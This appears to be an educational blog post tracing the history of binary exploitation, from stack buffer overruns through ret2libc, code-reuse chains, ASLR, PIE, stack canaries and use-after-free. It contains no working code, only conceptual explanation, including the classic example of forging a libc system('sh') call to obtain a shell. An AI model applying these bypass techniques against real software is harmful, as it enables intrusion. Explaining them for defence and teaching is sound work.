Although computer hackers have been breaking into systems, disabling and attacking networks, stealing intellectual property, and taking control over compromised systems for decades, the modern era of cyber-security only started in the ‘90s. But even in the early days of the new era, computer hacks were split into two main categories: social engineering and program exploitation, which continue to encompass almost all contemporary attacks. These two groups can be best explained by an example of each.

Social Engineering:

Abstract colorful background with high tech elements, computer keyboard, binary codes and various words related to internet security

The ILOVEYOU worm was a malicious script named “LOVE-LETTER-FOR-YOU.txt.vbs”, which spread through an email attachment disguised as a harmless text file. A certain level of user-interaction (namely, running the email attachment), was required to be infected.

Program Exploitation

In contrast, the Morris worm exploited a flaw in a legitimate computer program—the network daemon finger—to leverage full control over a target system. Absolutely no interaction with users is required; the process is fully automated. Little more is required than that the vulnerable system is connected to a network! A weaker cousin of this type of attack is also used to deface and shut down web servers.

Social engineering tactics have barely changed since their inception, while program exploits have underwent several quantum leaps in under twenty years. Therefore, I’ll focus solely on binary exploitation techniques for the remainder of this post.

The Good Old Days

In 1996, computer security expert Elias Levy, better known by the alias Aleph One, submitted an article to the hacker magazine Phrack entitled Smashing the Stack for Fun and Profit. It was the first detailed and public description of both how buffer overruns worked, and how to leverage them to gain total control over the target system (This was the vulnerability type used by the Morris worm).

On many C implementations it is possible to corrupt the execution stack by writing past the end of an array…  Code that does this is said to smash the stack, and can cause return from the routine to jump to a random address.  This can produce some of the most insidious data-dependent bugs known to mankind.

This flaw, caused by a programmer allowing more data to be written than space was allocated for, corrupts the internal state of the program. In the days of Aleph One, once a hacker found such a bug, he would proceed by overwriting the return address of a function. Understanding this requires a brief digression into compilers:

When a function is called, the program sets up a semi-isolated environment in which that function is run (known as the function’s stack space). Before the function begins, however, the program records its current location and writes that address to memory, the idea being that once the function ends, the program can simply look up the saved address of where it was before the function call (the stored return address) and resume where it left off.

However, as the aforementioned buffer overrun allows an attacker to change the program’s internal state, hackers can change the stored address to redirect execution to their own malicious code!

The Dawn of Exploit Mitigations

Before a hacker can fully exploit a buffer overrun, he needs malicious code to be already within the program’s memory. While this may seem like it would stop would-be-hackers in their tracks, early computers made absolutely no distinction between data and executable code, allowing hackers to disguise injected code as normal text. In response to the proliferation of hacks exploiting buffer overruns, security vendors began distributing early protections, both in software (the PaX team in 2000) and in hardware (Intel and AMD in 2004), known as DEP/W^X/NX/XD/AVP (quite a lot of different names). This protection added a systematic distinction between code and data: mandating that every word of memory could be writeable or executable—but not both. It was believed that this would forever stop programs being exploited and hacked, but all it did was start an arms race.

Payload Already Inside: Introduction to Code Reuse Attacks

Now that they could no longer directly insert and run arbitrary code, hackers realized that they still had a way to get the target application to execute specific instructions: ret2libc. The crux being that as they could shape the program’s internal state to however they wanted, hackers could mimic arbitrary calls to powerful system-level libraries, in effect telling the program to “resume execution” inside the library itself!

The canonical example, and the one from which this technique draws its name, is forging a call to libc_system(“sh\x00”), which creates an interactive command session between the hacker and the computer itself.

Randomization Based Defenses

The next wave of protections were based around removing critical knowledge for the attacker’s control. In direct response to the rise of ret2libc, software and operating system companies began shuffling around the addresses of libraries every time a program is run. Suitably called ASLR, or Address Space Layout Randomization, for a time, this completely threw a wrench in the underlying idea behind ret2libc, for how can you tell the program to resume execution in the library if you don’t know where the library is! However, the story doesn’t end here. Much like how hackers could reuse code from loaded libraries rather than injecting their own, particularly savvy researchers and attackers noticed that they could chain together small sets of machine instructions from the program’s code itself, essentially making the program a bootloader for a custom virtual machine! The machine instructions that compose a program have no idea that they’re being executed in a very odd order, and will happily compute and then passes execution onto the next segment. Significantly, this requires absolutely no interaction with a third party library, and because the program itself isn’t affected by ASLR, it bypasses all mentioned protections!

Continuing this cat and mouse game, the protection intended to beat this bypass came out christened PIE, short for Position Independent Executable. Without introducing any groundbreaking new tactics, it nonetheless hindered hackers by randomizing the address of the program itself. Without any foothold to stand on, attackers either had to blindly guess the randomized offsets (where being off by even one byte means complete failure), or had to leak the internal state of the program to defeat randomization.

Canaries and Coal Mines

There’s another critical randomization-based defense, but because it has a fundamentally different design philosophy than the above protections, I thought it best to separate it spatially. Known as Stack Canaries, this defense mechanism does a sanity check on its internal state before completing a function. (Under the hood, it writes a long pseudo-random value in front of the saved return address, and checks that this value hasn’t changed before it allows program execution to resume.) If these check fails, the program is forcibly terminated before the hacker can redirect its execution flow, thus preventing hacks at their moment of conception!

Though much simpler to implement than all of the above protections, the canary has been one of the most damning, being almost impossible to bypass via buffer overruns if correctly configured. This result bodes well for the general type of defense to which canaries belong: control flow guards. While DEP, ASLR, and PIE are general purpose defenses meant to make it harder for hackers to convert control over the runtime path of the program into full control of the application, control flow guards seek to prevent programs from ever deviating from well-defined paths. This is currently a high-profile area of research with no clear solution in sight, yet it is one of the only approaches with the potential to stop all hacks, of (nearly) all types, for all time!

The vulnerability class focused on in this post remained the leading underlying vulnerability in zero-day exploits until 2008, where it was replaced with a more customizable, powerful, and dangerous successor: use-after-free. While not intrinsically more dangerous than a buffer overrun, this vulnerability allows attacker to circumvent several protections specifically targeted at early common exploitation vectors. For instance, canaries have utterly no impact on exploiting use-after-free bugs, and this type of vulnerability allow hackers to defeat randomization based defenses via leaking program memory. Several novel defenses are having a fair degree of success in quashing use-after-free bugs, in particular heap isolation, but these protections, too, are being struck down.

There’s volumes of theory about exploit mitigations and how to bypass them, which is all too much for a single post. However, it suffices as a closing remark that these attacks are far more than simply academic concerns. Even the most stringent of protections are routinely bypassed on modern applications. Malware analysts have even identified novel exploitation techniques being used in the wild as recently as last month, and even the combination of every defense method discussed above and more have been bypassed in hacker competitions. The future, it seems, is a rapidly changing place. It’s getting harder to find bugs before they become in the wild exploits, and the lucrative market for zero day exploits continues to grow. With the stakes rising, everyone is suddenly playing an extremely dangerous game. Every company, regardless of scope, is directly connected to the Internet. But no framework is without flaws, so how long before hackers have a direct line to you?